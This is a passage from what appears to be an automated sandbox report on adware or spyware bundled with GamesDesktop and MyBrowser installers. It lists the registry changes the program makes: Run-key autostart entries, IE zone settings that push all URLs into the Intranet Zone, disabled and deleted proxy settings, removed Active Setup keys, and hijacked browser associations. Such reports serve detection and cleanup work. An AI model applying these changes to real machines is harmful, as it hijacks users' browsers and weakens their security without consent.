"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE security-zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To run itself automatically each time Windows boots, the SpyTool adds the following link to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010096.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe -runhelper"
The SpyTool deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsf2B.tmp:1664 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKCU\Software\Tutorials\updv]
"Version" = "15.09.24"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"HelpLink" = "http://re.gamesdesktop.com"
"Inno Setup: User" = "%CurrentUserName%"
"QuietUninstallString" = "%Program Files%\gmsd_re_005010096\unins000.exe /SILENT"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: App Path" = "%Program Files%\gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"UninstallString" = "%Program Files%\gmsd_re_005010096\unins000.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"InstallDate" = "20150926"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"NoRepair" = "1"
"InstallLocation" = "%Program Files%\gmsd_re_005010096\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"URLInfoAbout" = "http://re.gamesdesktop.com"
[HKCU\Software\TutoTag]
"OnceInstalled" = "re"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Publisher" = "GAMESDESKTOP"
[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft]
"Tinstalls" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: Language" = "re"
"DisplayName" = "GamesDesktop 092.005010096"
[HKCU\Software\Microsoft\Tinstalls]
"20150926" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: Icon Group" = "GAMESDESKTOP"
[HKLM\SOFTWARE\GAMESDESKTOP\gmsd_re_005010096]
"PathInstall" = "%Program Files%\gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"URLUpdateInfo" = "http://re.gamesdesktop.com"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 9B E8 E5 13 2D AC 35 DC 20 79 FF C2 7D C7 56"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"NoModify" = "1"
"Inno Setup: Setup Version" = "5.5.6 (a)"
[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"
"OnceInstalled2" = "re"
To run itself automatically each time Windows boots, the SpyTool adds the following link to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010096" = "%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe"
The SpyTool deletes the following registry key(s):
[HKCU\Software\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA848-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
[HKCU\Software\Microsoft\Active Setup\Installed Components]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{4b218e3e-bc98-4770-93d3-2731b9329278}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
The process nsf2B.tmp:668 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 67 77 1D 69 55 15 F3 4F EB 74 3E 9B C6 A1 AB"
The process nswA.tmp:1336 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 25 AC E3 B3 8E D3 91 44 01 AF 24 C8 81 EA DD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process gmsd_re_005010096.exe:592 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 9E D1 6F C3 38 D0 AA EF DC 44 FC D5 D6 BE 31"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process nsr19.tmp:204 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 9D C6 47 86 6D FD 8C 5E F7 81 B2 D5 78 01 56"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings so that all local web nodes (names without dots) that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsdF.tmp:1060 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 0C 8A 19 3A 70 AF 02 72 88 8F 32 A4 56 22 7F"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process fsd34.exe:1692 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 8D AA A4 34 80 73 81 87 53 A4 0B B8 84 02 18"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings so that all local web nodes (names without dots) that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Perl\bin]
"perl.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-KUMK3.tmp]
"nsf2B.tmp"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9227"
"SHELL32.dll,-8964"
"SHELL32.dll,-9319"
"SHELL32.dll,-9217"
"SHELL32.dll,-9216"
The process nsw42.tmp:660 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 69 E7 D4 C3 47 4E AA 92 96 CB FB DC 43 10 3C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process nsx46.tmp:2724 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C B7 30 EF 41 21 51 2A A9 96 F2 AE 4C 48 31 01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings so that all local web nodes (names without dots) that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process setup.exe:1356 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"IconsVisible" = "1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"Name" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationDescription" = "MyBrowser is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into MyBrowser."
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"UninstallArguments" = " --uninstall --system-level"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMinor" = "95"
[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayVersion" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationName" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallDate" = "20150926"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"
[HKCR\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"
[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser,"
[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMajor" = "2171"
[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"irc" = "CRSBRWSHTML"
[HKCR\ftp\DefaultIcon]
